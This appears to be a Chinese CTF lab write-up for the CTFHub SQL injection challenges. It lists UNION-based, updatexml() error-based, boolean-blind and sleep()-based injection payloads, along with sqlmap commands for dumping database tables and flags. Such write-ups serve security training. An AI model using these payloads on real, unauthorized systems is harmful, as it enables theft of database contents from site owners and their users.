ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入

整型注入

判断页面是否正常,1=1和1=2是俩个页面

在判断字段数

开始测试回显位置

获得库名

获得库的表

?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+

获得数据

?id=11 and 1=1 union select 1,concat_ws('>',flag) from flag

字符型注入

查看闭合情况

查看字段数

和整型就一样了,就是多了个闭合

获得库

获得表

?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+

获得数据

?id=-1' and 1=1 union select 1,concat_ws('>',flag) from flag--+

报错注入

常见报错函数

extractvalue()
updatexml()
floor()
exp()
geometrycollection()
multipoint()
polygon()
multipolygon()
linestring()
multilinestring()
其中原理主要是
xpath 语法错误
BIGINT 等数据类型溢出
count()+rand()+groupby() 导致主键冲突

判断字段数,字段数为2

获得库

?id=-1 and updatexml(1,concat(1,database()),2) --+

获得表

?id=-1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema ='sqli'))),2)

获得flag

?id=-1 and updatexml(1,(concat(1,(select flag from sqli.flag))),2)

布尔盲注

特点:布尔盲注,结果只有 ture false 两种情况
相关函数
ascii() / ord() 将某个字符串转化为 ascii
语句: select ascii(mid(user(),1));
Lenght() 返回字段 / 结果的长度
语法: select length(user())
count() 聚合函数也称作计数函数,返回查询对象的总数
语法: select count(*) from student;
substr() 此函数是用来截取字符串一部分。
语法: select substr(user(),1,2);
limit 限制查询数
limit 0,1 第一个数据
sqlmap直接跑
判断库名长度
and length(database())=4 --+
慢慢等一会,他有点慢,出现了库名sqli
sqlmap -u url --dbs

获取表名flag

sqlmap -u url -D 库名 --tables

获取内容

sqlmap -u url -D sqli -T columns --dump

时间盲注

相关函数

sleep() 网页延迟 n 秒后,输出结果
if(a,b,c) if 判断句, a 为条件, b c 为执行语句;如果 a 为真就执行 b a 为假就执行 c;
ascii() 函数 /ord() 函数 将某个字符串转化为 ascii
length() 函数 获取字符串的长度
substr()/mid() 函数
时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站 没有错误和正确的页面回显 (完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构 造闭合。
测时间盲注的话直接?id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注
技能树的这些sql,肯定是存在,所以直接sqlmap获取库名
sqlmap -u url --dbs
获取表名
sqlmap -u url -D sqli --tables

获取数据

sqlmap -u url -D sqli -T flag columns --dump

mysql结构

sqlmap跑不出来,说明只能手注了
测试字段数
获取库名
获取表名,发现有俩个表
获取第二个表的字段名
获得数据

cookie注入

抓包,查看是那种类型注入,数字型注入

判断字段数和回显位置

获得库名sqli

获取表名zqfiedhdri

获取目标字段rfbtnrfvhc

获得数据

ua注入

和cookie注入一样,就是输入的地方不一样

抓包,发送到intruder,判断什么类型注入

还是整型注入,判断回显位置

获取库名sqli

获取表名fxzppwgkjn

获取字段名spnvpvyyjw

获取数据

refer注入

如果抓包没有refer的话,手动添加referer

判断类型,判断回显,和上面俩个一样,就不多写了,获取库名

获取表名eedqdazyny

获取字段名nekrgdymxv

获取数据

  • 28
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值